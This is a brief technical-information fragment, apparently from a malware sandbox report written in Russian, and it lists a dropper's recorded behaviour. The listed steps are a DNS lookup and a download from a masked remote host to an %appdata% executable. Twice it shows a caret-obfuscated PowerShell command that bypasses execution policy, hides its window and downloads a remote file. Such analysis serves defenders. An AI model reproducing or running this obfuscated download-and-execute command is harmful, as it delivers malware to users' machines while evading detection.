Техническая информация
- http://lt##.#sianetwork.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^Ers^hE^Ll.^exe -^E^X^e^c^u^TIOnPOl^icy^ bY^pASs ^-^NopRo^fI^l^E ^-^windOwSTYlE ^H^iD^D^En ^(new-obJEC^t sYste^M.^ne^t^.WE^Bcli^E^nT).^d^O^wN^LO^A^dfI^le('http://lt##....
- DNS ASK lt##.#sianetwork.pl
- '<SYSTEM32>\cmd.exe' /C "POW^Ers^hE^Ll.^exe -^E^X^e^c^u^TIOnPOl^icy^ bY^pASs ^-^NopRo^fI^l^E ^-^windOwSTYlE ^H^iD^D^En ^(new-obJEC^t sYste^M.^ne^t^.WE^Bcli^E^nT).^d^O^wN^LO^A^dfI^le('http://lt##....' (со скрытым окном)